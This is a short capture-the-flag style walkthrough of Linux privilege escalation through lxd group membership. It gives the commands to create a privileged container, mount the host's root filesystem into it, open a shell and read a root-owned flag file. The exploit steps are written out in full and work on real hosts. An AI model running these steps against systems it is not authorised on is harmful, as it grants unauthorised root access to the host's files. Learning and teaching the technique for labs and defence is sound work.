Privilege Escalation: LXD group

21 Jul, 2023

We have a user who is in the lxd group. The command to create a container:
lxc init ubuntu:16.04 exploit -c security.privileged=true

• lxc init ubuntu:16.04 exploit creates a new Ubuntu container with the name exploit
• -c security.privileged=true gives the container access to the host's hard drive.

Next, you will mount the host filesystem to the container. You want to mount the root of the host OS to some directory in the container. To do this, run the following command:
lxc config device add exploit foo disk source=HOST_OS_DIRECTORY path=CONTAINER_MOUNT_LOCATION recursive=true

• lxc config device add exploit foo disk adds a disk called foo to the container exploit
• source specifies which directory in the host filesystem should be mounted
• path specifies where the host filesystem will be mounted inside the container
• recursive=true specifies that folders should be added recursively

The HOST_OS_DIRECTORY should be the root directory, /. The CONTAINER_MOUNT_LOCATION should be an available directory on the container. For example, /mnt/root.

All you have to do now is start the container and read the flag.
lxc start exploit starts the container.
lxc exec exploit bash gives you an interactive shell in the container.

If you specified the mount location to be /mnt/root, then inside the container, the flag is located at /mnt/root/root/flag.txt